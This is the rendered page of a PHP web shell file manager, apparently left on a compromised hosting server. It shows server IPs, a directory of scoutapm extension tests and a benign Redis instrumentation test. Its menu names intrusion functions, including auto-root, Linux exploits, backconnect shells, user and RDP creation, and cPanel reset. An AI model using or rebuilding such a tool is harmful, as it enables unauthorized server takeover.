Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.118.146.183
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
tests /
alt-php83-pecl-scoutapm_1.10.0-1.el8 /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
001-check-ext-loaded.phpt
375
B
-rw-r--r--
002-file_get_contents.phpt
701
B
-rw-r--r--
003-scoutapm_get_calls-clears-...
480
B
-rw-r--r--
004-namespaced-fgc-is-not-logg...
1.66
KB
-rw-r--r--
005-requiring-external-files-h...
292
B
-rw-r--r--
006-anonymous-classes-handled....
349
B
-rw-r--r--
007-evaled-code-handled.phpt
289
B
-rw-r--r--
008-class-with-no-constructor-...
275
B
-rw-r--r--
009-curl_exec.phpt
892
B
-rw-r--r--
010-fwrite-fread-fopen.phpt
894
B
-rw-r--r--
010-fwrite-fread-tmpfile.phpt
876
B
-rw-r--r--
011-pdo-exec.phpt
910
B
-rw-r--r--
011-pdo-query.phpt
814
B
-rw-r--r--
011-pdostatement-execute-pdo-p...
1.05
KB
-rw-r--r--
012-file_put_contents.phpt
668
B
-rw-r--r--
013-fix-memory-leak-when-scout...
510
B
-rw-r--r--
014-predis-support.phpt
4
KB
-rw-r--r--
015-phpredis-support.phpt
3.13
KB
-rw-r--r--
016-memcached-support.phpt
4.36
KB
-rw-r--r--
017-elastic-7-support.phpt
2.24
KB
-rw-r--r--
018-do-not-instrument-by-defau...
694
B
-rw-r--r--
019-url-method-capture-fgc.php...
942
B
-rw-r--r--
020-url-method-capture-curl-po...
887
B
-rw-r--r--
021-url-method-capture-curl-cu...
914
B
-rw-r--r--
022-elastic-8-support.phpt
2.63
KB
-rw-r--r--
bug-47.phpt
545
B
-rw-r--r--
bug-49.phpt
589
B
-rw-r--r--
bug-55.phpt
855
B
-rw-r--r--
bug-71.phpt
704
B
-rw-r--r--
bug-88.phpt
979
B
-rw-r--r--
bug-93.phpt
530
B
-rw-r--r--
external.inc
50
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 015-phpredis-support.phpt
--TEST-- PHP Redis C extension functions are instrumented --SKIPIF-- <?php if (!extension_loaded("scoutapm")) die("skip scoutapm extension required."); if (!extension_loaded("redis")) die("skip redis extension required."); if (!getenv('CI')) { // Check Redis is running & can connect to it // Run with: docker run --rm --name redis -p 6379:6379 -d redis $client = new Redis(); try { $client->connect('127.0.0.1', 6379); } catch (\RedisException $e) { die("skip " . $e->getMessage()); } } ?> --FILE-- <?php echo implode("\n", array_intersect( [ 'redis->append', 'redis->decr', 'redis->decrby', 'redis->get', 'redis->getbit', 'redis->getrange', 'redis->getset', 'redis->incr', 'redis->incrby', 'redis->mget', 'redis->mset', 'redis->msetnx', 'redis->set', 'redis->setbit', 'redis->setex', 'redis->psetex', 'redis->setnx', 'redis->setrange', 'redis->strlen', 'redis->del', ], scoutapm_list_instrumented_functions() )) . "\n"; scoutapm_enable_instrumentation(true); $client = new Redis(); $client->connect('127.0.0.1', 6379); // Simple operations $client->set('foo', 'bar'); var_dump($client->get('foo')); $client->append('foo', 'baz'); $client->del('foo'); $client->getSet('foo', 'bat'); $client->getRange('foo', 0, 2); $client->setRange('foo', 0, 'qux'); $client->setEx('expire1', 1, 'value1'); $client->pSetEx('expire2', 1, 'value2'); $client->setNx('fuu', 'new'); $client->strlen('fuu'); // Increment/Decrement $client->set('count', 0); $client->incr('count'); $client->decr('count'); $client->incrBy('count', 2); $client->decrBy('count', 2); // Multi-operations $client->mSet(['a' => 'a', 'b' => 'b']); $client->mSetNx(['c' => 'c', 'd' => 'd']); $client->mGet(['a', 'b', 'c', 'd']); // Bit operations $client->set('bit', 0); $client->setBit('bit', 8, 1); $client->getBit('bit', 8); $calls = scoutapm_get_calls(); var_dump(array_column($calls, 'function')); ?> --EXPECTF-- redis->append redis->decr redis->decrby redis->get redis->getbit redis->getrange redis->getset redis->incr redis->incrby redis->mget redis->mset redis->msetnx redis->set redis->setbit redis->setex redis->psetex redis->setnx redis->setrange redis->strlen redis->del string(%s) "bar" array(%d) { [%d]=> string(%d) "Redis->set" [%d]=> string(%d) "Redis->get" [%d]=> string(%d) "Redis->append" [%d]=> string(%d) "Redis->del" [%d]=> string(%d) "Redis->get%cet" [%d]=> string(%d) "Redis->getRange" [%d]=> string(%d) "Redis->setRange" [%d]=> string(%d) "Redis->setex" [%d]=> string(%d) "Redis->psetex" [%d]=> string(%d) "Redis->setnx" [%d]=> string(%d) "Redis->strlen" [%d]=> string(%d) "Redis->set" [%d]=> string(%d) "Redis->incr" [%d]=> string(%d) "Redis->decr" [%d]=> string(%d) "Redis->incrBy" [%d]=> string(%d) "Redis->decrBy" [%d]=> string(%d) "Redis->mset" [%d]=> string(%d) "Redis->msetnx" [%d]=> string(%d) "Redis->mget" [%d]=> string(%d) "Redis->set" [%d]=> string(%d) "Redis->setBit" [%d]=> string(%d) "Redis->getBit" }
Close